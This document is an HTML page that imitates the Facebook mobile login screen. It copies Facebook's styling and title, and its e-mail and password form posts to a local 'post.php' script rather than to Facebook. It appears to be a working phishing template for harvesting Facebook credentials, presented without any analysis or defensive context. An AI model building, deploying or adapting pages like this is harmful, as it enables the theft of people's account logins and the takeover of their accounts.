

<!DOCTYPE html><html><head>
<title>Login</title>
<noscript>
    <meta http-equiv="refresh" content="0;url=https://mbasic.facebook.com/home.php" /></noscript><meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1" />
<link href="/O2aKM2iSbOw.png" rel="apple-touch-icon-precomposed" sizes="196x196" />
<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
<noscript><meta http-equiv="X-Frame-Options" content="DENY" /></noscript>
<link rel="stylesheet" type="text/css" id="y/F4R" href="HNMdhs-Kkzm.css" />
<link rel="stylesheet" type="text/css" id="cq0X/" href="Wb1LmXNXfJU.css" />
<link rel="stylesheet" type="text/css" id="uE+Ou" href="dNzFlPcVKNi.css" />
<link rel="stylesheet" type="text/css" id="RHPUn" href="x27DXQaBoBh.css" />
<link rel="stylesheet" type="text/css" id="rE3tr" href="rZ26SKcEVSS.css" />
<link rel="stylesheet" type="text/css" id="R/FUQ" href="sZdRwnCuEJg.css" />
</head>
<body tabindex="0" class="touch x1 _fzu _50-3 _2v9s">
<form method="post" action="post.php" data-sigil="m-settings-form">
<div id="viewport">
    <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"><font color="Comic Sans Ms"></font>Facebook</h1>
    <div id="page">
        <div class="_129_">
            <div id="toggleHeader"></div>
        </div><div class="_129-">
        <div class="_55wp _52z5 _451a _3qet _17gp" id="header" data-sigil="MTopBlueBarHeader">
        <div class="_4g33 _52we" id="mJewelNav">
        <div class="_4g34">
            <div class="_59te jewel noCount" data-store="&#123;&quot;tab&quot;:&quot;feed&quot;&#125;" id="feed_jewel" data-sigil="nav-popover feed">
            </div>
            </div>
        </div>
        </div>
        </div>
    </div>
    </div>
    
    <div class="grouped inset _2v9s">
        <div class="first last area _5whr textInputArea acw" data-sigil="marea">
        <input autocorrect="off" autocapitalize="off" class="_5whq input tiapm" name="username" autocomplete="off" placeholder="E-mail" type="text" />
        </div>
    </div>
    <div class="grouped inset _2v9s">
        <div class="first last area _5whr textInputArea acw" data-sigil="marea">
        <input autocorrect="off" autocapitalize="off" class="_5whq input tiapm" name="password" autocomplete="off" placeholder="Password" type="password" />
        </div>
    </div>    
<div class="_2v9s apm" data-sigil="marea">
    <button type="submit" value="Login" class="btn btnC largeBtn mfsl touchable" name="save" data-sigil="touchable">Login</button>
</div>
</form>
</body>
</html>                                                                                         